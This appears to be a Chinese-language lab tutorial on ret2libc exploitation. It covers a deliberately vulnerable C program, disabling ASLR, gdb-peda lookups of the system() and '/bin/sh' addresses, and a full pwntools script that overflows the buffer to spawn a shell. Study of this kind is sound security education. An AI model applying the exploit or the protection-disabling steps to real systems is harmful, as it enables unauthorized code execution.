代码是1.c:
#include <stdio.h>#include <stdlib.h>#include <unistd.h>void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256);}int main(int argc, char** argv) { vulnerable_function(); write(STDOUT_FILENO, "Hello, World\n", 13);}
gcc -fno-stack-protector -o 1 1.c
关闭ASLR:
sudo -s
echo 0 > /proc/sys/kernel/randomize_va_space
exit
可以看到编译的程序确实开启了DEP:
Type "apropos word" to search for commands related to "word"...因为程序关闭了ASLR,所以函数的地址等信息是不变的
Reading symbols from ./1...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
gdb-peda$
因为此时栈上不能执行代码,所以我们可以想法在libc.so上找到相关函数,字符串等信息,然后执行之。
gdb-peda$ print system可以看到此时system地址为0xb7e56190 ,字符串"/bin/sh"地址为0xb7f76a24 下边是exp:
$6 = {<text variable, no debug info>} 0xb7e56190 <__libc_system>
gdb-peda$ print __libc_start_main
$7 = {int (int (*)(int, char **, char **), int, char **, int (*)(int, char **,
char **), void (*)(void), void (*)(void),
void *)} 0xb7e2f990 <__libc_start_main>
gdb-peda$ searchmem "/bin/sh" libc
Searching for '/bin/sh' in: libc ranges
Found 1 results, display max 1 items:
libc : 0xb7f76a24 ("/bin/sh")
gdb-peda$ x/s 0xb7f76a24
0xb7f76a24:"/bin/sh"
gdb-peda$
#!/usr/bin/env python
from pwn import *
p = process('./1')
#p = remote('127.0.0.1',10002)
ret = 0xdeadbeef
systemaddr=0xb7e56190
binshaddr=0xb7f76a24
payload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)
p.send(payload)
p.interactive()